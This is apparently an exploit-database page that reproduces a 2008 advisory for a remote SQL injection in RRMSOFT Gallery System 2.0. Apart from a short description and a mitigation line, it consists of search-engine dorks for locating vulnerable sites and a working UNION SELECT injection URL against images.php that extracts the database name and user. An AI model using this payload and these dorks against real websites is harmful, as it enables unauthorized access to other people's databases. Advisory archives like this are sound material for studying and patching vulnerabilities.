header-logo
Suggest Exploit
vendor:
RRMSOFT Gallery System
by:
you_kn0w
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RRMSOFT Gallery System
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:rmsoft:rrmsoft_gallery_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

RRMSOFT Gallery Remote SQL Injection

RRMSOFT Gallery System is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to the database and execute arbitrary SQL queries.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=#
# ~Author: you_kn0w	                       #
# ~Contact: you-know[at]linuxmail.org          #
# ~Website: www.youknowz.info                  # 
# ~Script: RRMSOFT Gallery                     #
# ~Bug: RRMSOFT Gallery Remote SQL Injection   #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#
#               Script Information             #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=#    
#                                              # 
# Script name: RRMSOFT Gallery System          #
# Script site: http://www.xoopsmexico.net      #
# Script get:  www.xoopsmexico.net/modules/rmdp#
# Description:  PHP media gallery System       #
# Version: 2.0                                 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=# 

# [-]Dorks:
             intext:Powered by RMSOFT GS 2.0
           inurl:modules/rmgs/images.php
         
       

# [+]How To Exploit:
 
 http://[target].com/[path]/modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*



# [+]Greetz:
 
 Greetz to; ka0x - Celciuz - JosS - Phanter-Root & Screamo

//you_kn0w
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# milw0rm.com [2008-02-05]